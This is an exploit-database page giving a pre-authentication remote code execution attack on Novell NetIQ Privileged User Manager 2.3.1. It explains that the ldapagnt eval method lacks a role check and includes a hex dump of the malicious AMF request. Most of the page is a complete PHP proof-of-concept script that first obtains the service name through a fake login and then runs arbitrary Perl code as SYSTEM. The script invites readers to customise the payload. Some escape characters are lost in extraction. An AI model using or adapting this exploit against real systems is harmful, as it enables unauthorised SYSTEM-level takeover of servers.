[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Novell NetIQ Privileged User Manager 2.3.1 ldapagnt.dll ldapagnt_eval() Perl Code Evaluation RCE
# Published : 2012-11-15
# Author :
# Previous Title : MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot)
# Next Title : Apple QuickTime 7.7.2 MIME Type Buffer Overflow
Novell NetIQ Privileged User Manager 2.3.1 ldapagnt.dll ldapagnt_eval()
Perl Code Evaluation RCE (pre auth/SYSTEM)
Tested against: Microsoft Windows 2003 r2 sp2
download url: http://download.novell.com/index.jsp
(search "Privileged User Manager")
file tested: NetIQ-PUM-2.3.1.iso
(decompress and launch netiq_pum_manager_2.3.1_x86.msi)
Background:
The mentioned product installs a Windows service (unifid.exe) called 'npum',
display name: "NetIQ Privileged User Manager" which listens on
default tcp port 443 (https) for incoming connections.
Vulnerabilty:
The secure web interface contains a flaw which allows, without prior
authentication, to execute a Perl script with SYSTEM privileges.
This can be done by sending a POST request with well formed
data.
Example data:
0 : 00 00 00 00 00 01 00 14 53 50 46 2e 55 74 69 6c [........SPF.Util]
10 : 2e 63 61 6c 6c 4d 6f 64 75 6c 65 41 00 00 00 00 [.callModuleA....]
20 : 02 0a 0a 00 00 00 01 03 00 03 70 6b 74 03 00 06 [..........pkt...]
30 : 6d 65 74 68 6f 64 02 00 04 65 76 61 6c 00 06 6d [method...eval..m]
40 : 6f 64 75 6c 65 02 00 08 6c 64 61 70 61 67 6e 74 [odule...ldapagnt]
50 : 00 04 45 76 61 6c 03 00 07 63 6f 6e 74 65 6e 74 [..Eval...content]
60 : 02 00 17 73 79 73 74 65 6d 28 22 63 61 6c 63 2e [...system("calc.]
70 : 65 78 65 22 29 3b 0a 0a 31 3b 0a 0a 31 3b 00 00 [exe");..1;..1;..]
80 : 09 00 00 09 00 03 75 69 64 02 00 00 00 00 09 00 [......uid.......]
90 : 08 73 76 63 5f 6e 61 6d 65 02 00 06 61 6e 64 72 [.svc_name...andr]
A0 : 65 61 00 00 09 [ea...]
Note that the uid argument is empty.
Explaination:
Open C:Program FilesNovellnpumservicelocalldapagntmodule.xml
(this is the configuration file of the 'ldapagnt' module).
...
<Library type="dso" lib="lib/ldapagnt">
<Method name="init_ldap_cred" init="init_ldapcred" />
<Method name="eval" svc="ldapagnt_eval" /> <--------------------------
</Library>
...
no role is defined for the eval() method which corresponds to
the ldapagnt_eval() function inside ldapagnt.dll.
As attachment, proof of concept code, which launches calc.exe
from remote. Customize the shellcode for your own use.
PoC:
<?php
/*
Novell NetIQ Privileged User Manager 2.3.1 ldapagnt.dll ldapagnt_eval() Remote
Perl Code Evaluation RCE (pre auth/SYSTEM)
rgod
*/
error_reporting(E_ALL ^ E_NOTICE);
set_time_limit(0);
$err[0] = "[!] This script is intended to be launched from the cli!";
$err[1] = "[!] You need the curl extesion loaded!";
if (php_sapi_name() <> "cli") {
die($err[0]);
}
function syntax() {
print("usage: php 9sg_novell_netiq_ii.php [ip_address]rn" );
die();
}
$argv[1] ? print("[*] Attacking ...n") :
syntax();
if (!extension_loaded('curl')) {
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true :
false;
if ($win) {
!dl("php_curl.dll") ? die($err[1]) :
print("[*] curl loadedn");
} else {
!dl("php_curl.so") ? die($err[1]) :
print("[*] curl loadedn");
}
}
function _s($url, $is_post, $ck, $request) {
global $_use_proxy, $proxy_host, $proxy_port;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
if ($is_post) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $request);
}
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
"Cookie: ".$ck,
"Content-Type: application/x-amf", //do not touch this, important
"x-flash-version: 11,4,402,278"
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BOIE9;ENUSMSCOM)");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
if ($_use_proxy) {
curl_setopt($ch, CURLOPT_PROXY, $proxy_host.":".$proxy_port);
}
$_d = curl_exec($ch);
if (curl_errno($ch)) {
//die("[!] ".curl_error($ch)."n");
} else {
curl_close($ch);
}
return $_d;
}
/*********************************** config **********************************/
$host = $argv[1];
$port = 443;
$code="system("calc.exe");";
$identity="";
/*****************************************************************************/
function hex_dump($data, $newline="n") {
static $from = '';
static $to = '';
static $width = 16; static $pad = '.';
if ($from==='') {
for ($i=0; $i<=0xFF; $i++) {
$from .= chr($i);
$to .= ($i >= 0x20 && $i <= 0x7E) ? chr($i) : $pad;
}
}
$hex = str_split(bin2hex($data), $width*2);
$chars = str_split(strtr($data, $from, $to), $width);
$offset = 0;
foreach ($hex as $i => $line) {
echo sprintf('%6X',$offset).' : '.implode(' ', str_split($line,2)) . ' [' . $chars[$i] . ']' . $newline; $offset += $width;
}
sleep(1);
}
print("[*] I need the service name, fake login request ...n");
$data=
"x00x00x00x00x00x01x00x15x53x50x46x2ex55x74". // ..........SPF.Ut
"x69x6cx2ex63x61x6cx6cx4dx6fx64x75x6cx65x45x78x00". // il.callModuleEx.
"x02x2fx34x00x00x00x64x0ax00x00x00x01x03x00x03x70". // ./4...d........p
"x6bx74x03x00x0bx43x72x65x64x65x6ex74x69x61x6cx73". // kt...Credentials
"x03x00x04x6ex61x6dx65x02x00x04x74x65x73x74x00x06". // ...name...test..
"x70x61x73x73x77x64x02x00x04x74x65x73x74x00x00x09". // passwd...test...
"x00x06x6dx65x74x68x6fx64x02x00x05x6cx6fx67x69x6e". // ..method...login
"x00x06x6dx6fx64x75x6cx65x02x00x04x61x75x74x68x00". // ..module...auth.
"x03x75x69x64x06x00x00x09x00x00x09"; // .uid.......
print(hex_dump($data)."n");
$url = "https://$host:$port/";
$out = _s($url, 1, "", $data);
print(hex_dump($out)."n");
$tmp=explode("svc",$out);$tmp=$tmp[1];$len=unpack("n",$tmp[1].$tmp[2]);
$svc_name="";
for ($i=0; $i<$len[1]; $i++){
$svc_name.=$tmp[$i + 3];
}
echo "[*] svc_name -> ".$svc_name."n";
$data=
"x00x00x00x00x00x01".
"x00x14".
"SPF.Util.callModuleA".
"x00x00".
"x00".
"x00x02".
"x0ax0a". //whatever
"x00x00x00x01x03".
"x00x03".
"pkt".
"x03".
"x00x06".
"method".
"x02".
"x00x04".
"eval".
"x00x06".
"module".
"x02".
"x00x08".
"ldapagnt".
"x00x04".
"Eval".
"x03".
"x00x07".
"content".
"x02".
pack("n",strlen($code) + 4).
$code.
"x0ax0a1;x0ax0a1;".
"x00x00x09".
"x00x00x09".
"x00x03".
"uid".
"x02".
pack("n",strlen($identity)).
$identity.
"x00x00x09".
"x00x08".
"svc_name".
"x02".
pack("n",strlen($svc_name)).
$svc_name.
"x00x00x09";
print(hex_dump($data)."n");
$url = "https://$host:$port/";
$out = _s($url, 1, "", $data);
print(hex_dump($out)."n");
?>